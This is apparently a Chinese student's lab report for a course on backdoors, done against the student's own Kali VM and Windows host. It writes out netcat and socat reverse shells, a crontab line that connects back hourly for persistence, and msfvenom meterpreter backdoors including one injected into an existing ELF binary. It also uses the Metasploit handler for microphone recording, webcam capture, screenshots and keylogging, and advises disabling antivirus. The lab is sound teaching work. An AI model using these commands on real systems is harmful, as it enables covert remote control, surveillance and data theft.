20232301郑好 实验二 后门原理与实践
备份于: 2025-10-13 19:56
实验2 后门原理与实践
一、实验内容
1.实践目标
(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)
PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
通过这五个实验可以用不同工具和方式获取远程主机的操作权限并实现持久化控制。
2.实验要求
掌握后门原理及免杀技术
问答问题
(1)例举你能想到的一个后门进入到你系统中的可能方式?
比如说在网上随便下了个破解版软件(像盗版adobe全家桶、游戏这种),尤其是p2p告诉下载(崽)器这种,安装时没注意取消隐藏选项,里面藏的后门可能就跟着装到系统里了
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows系统中可能会改注册表的 Run 项,把后门路径加进去,开机就自动启动,Linux可能用crontab定时任务,比如设成每小时执行一次后门脚本,藏在系统定时任务里
(3)Meterpreter有哪些给你映像深刻的功能?
能直接从目标电脑里下载文件,比如偷偷拷走我的文档、照片等等,侵犯个人隐私
(4)如何发现自己有系统有没有被安装后门?
用杀软,或者电脑就算正常使用也比以前卡,检查开机启动项或者打开任务管理器看有没有奇怪的进程
二.实验过程
(1)使用netcat获取主机Shell,并cron启动某项任务。
先查询两机ip并测试本次实验用到的主机和虚拟机之间的连通性,发现可以互ping成功
在kali中输入nc -l -p 12138
监听12138端口,并在windows的cmd中输入ncat.exe -e cmd.exe 192.168.143.128 12138
在kali界面就可以看到windows命令提示
接下来用windows获取kali的shell
与之相反,在windows输入ncat.exe -l -p 12138进行监听,而kali输入nc 192.168.43.209 12138 -e /bin/sh
可以看到windows获取了kali的shell
在虚拟机中启动cron并在主机监听
在虚拟机上利用crontab -e
指令编辑定时任务,输入2用vim编辑器在最后一行添加
35 * * * * nc 192.168.43.209 12138 -e /bin/sh
表示每个小时的35分反向链接windows的12138端口
这样即可在每个小时的35分获取kali的shell
(2)使用socat获取主机shell
在Windows中按Win+R,再输入compmgmt.msc
打开计算机管理
点击创建任务
设置触发器,设置操作为启动先前下载好的程序socat.exe,添加参数:
tcp-listen:12138 exec:cmd.exe,pty,stderr
当到达设定时间后,windows弹出了一个窗口
此时在kali输入socat - tcp:192.168.43.209:12138
可以发现我们成功获取了windows主机shell(dir命令的输出太长就不全部展示了)
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在kali虚拟机上生成后门可执行程序,指令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.143.128 LPORT=12138 -f exe > 20232301zh_backdoor.exe
后门程序创建成功
主机输入ncat.exe -l 12138 > 20232301zh_backdoor.exe
开启监听
接下来在Kali上用nc 192.168.43.209 12138 < 20232301zh_backdoor.exe
将生成的后门程序传过去
在主机可以查找到该程序
随后在kali虚拟机中输入msfconsole打开msf控制台
(忍者?)
接下来开始进行配置,依此输入如下命令:
use exploit/multi/handler #进入监听模块
set payload windows/meterpreter/reverse_tcp #攻击载荷
set LHOST 192.168.143.128
set LPORT 12138
输入exploit
开始监听,在主机上运行home程序
可以看到我们已经成功获取到了windows的shell(其实中间有好多问题搞了好久才解决,后边会说明)
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。
对目标主机截获音频
承接之前的exploit,输入record_mic
进行录音
输入webcam_snap
调用摄像头拍照
(这里拍出来的照片是黑屏,推测可能是电脑硬件某些方面出了问题,因为执行该指令后是可以看到摄像头的灯打开和权限被调用的,这点已经和老师沟通过了)
输入screenshot
可以进行截屏
输入
keyscan_start
读取击键
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
输入指令:
格式为::msfvenom -p [payload类型]
LHOST=[KaliIP] LPORT=[自定义端口]
-x [原始文件] -f [输出格式] > [恶意文件]
#####请注意这是一整条命令
msfvenom -p linux/x86/meterpreter/reverse_tcp
LHOST=192.168.143.128 LPORT=12138
-x ./pwn20232301shiyan2 -f elf > pwnh
在这段指令中,-p linux/x86/meterpreter/reverse_tcp
仿照任务4中windows的目录指定了使用的 payload 类型,即适用于 Linux x86 系统的 meterpreter 反向 TCP 载荷。LHOST=192.168.143.128,LPORT=12138
表示相应攻击主机的ip和连接端口。-x ./pwn20232301shiyan2
将 payload 注入到当前目录下名为pwn20232301shiyan2
的文件中(即作为载体);-f elf 指定生成文件的格式为 ELF(适用于 Linux 系统);最后> pwnh
制定了输出的恶意文件是pwnh
输入chmod +x ./pwnh
添加执行权限,才可以完成后边的实验
与任务四相仿,进入msf交互界面,输入
use exploit/multi/handler #进入监听模块
set payload linux/x86/meterpreter/reverse_tcp #攻击载荷
set LHOST 192.168.143.128
set LPORT 12138
输入exploit开始监听,打开另一个终端,输入./pwnh
运行恶意文件,发现之前的终端已经可以获取到shell了(如图框中的内容)
三.问题及解决方案
1.在msf进行exploit命令时出现如下问题:
Meterpreter session 1 closed.
Reason: Died
在网上查询好久都没有合适的解决方法,在此特别感谢毕悠尘同学发现了解决方法:
主要原因在于Kali Linux 系统中安装的 Ruby 版本与 Metasploit 框架当前版本所依赖的 Ruby 版本不兼容。
解决步骤:
①:使用以下两条命令更新 Metasploit 框架及其所有依赖项
sudo apt update
sudo apt update && sudo apt install metasploit-framework
②:下载安装 Visual C++ Redistributable:
前往微软官方下载页面:Microsoft Visual C++ Redistributable Latest Supported Downloads
下载 vc_redist.x86.exe(32位版本)
在目标 Windows 主机上运行安装程序并重新启动即可解决
2.windows不让执行任务3、4中的后门程序,而且会自动删除文件
解决方法:暂时关闭windows的病毒和威胁防护,就可以成功运行
3.在任务5中运行pwnh时提示权限不够
解决方法需要输入chmod +x ./pwnh
添加执行权限
4.学习感悟与思考
这次实验流程比较长,也费了一番功夫,总的来说这次实验让我受益匪浅,学到了好多攻击手段,可以更好的对网络攻击加以预防。同时对于后门这个概念有了较为深入的理解。总体做下来很累,但是也比较有趣,不仅实现了跨系统的攻击,还真正的调用了我的录音设备和摄像头,还可以进行截屏之类的操作,以前我只在影视作品中见识过这种技术,今天得以实操,让我不禁感叹后门程序的强大。不过整个实验过程有一部分工作是用来关病毒检测和防火墙之类的,也可以看出现在防护措施已经在进步了,如果自己不点程序,也不会被攻击,这也恰恰说明了生活中我们要强加提防相关攻击,网络攻击防御最薄弱的地方还是人,不要被某些破解版软件诱骗,一定要擦亮眼睛。
在此感谢老师和同学们的帮助得以解决了遇到的种种困难,顺利完成实验。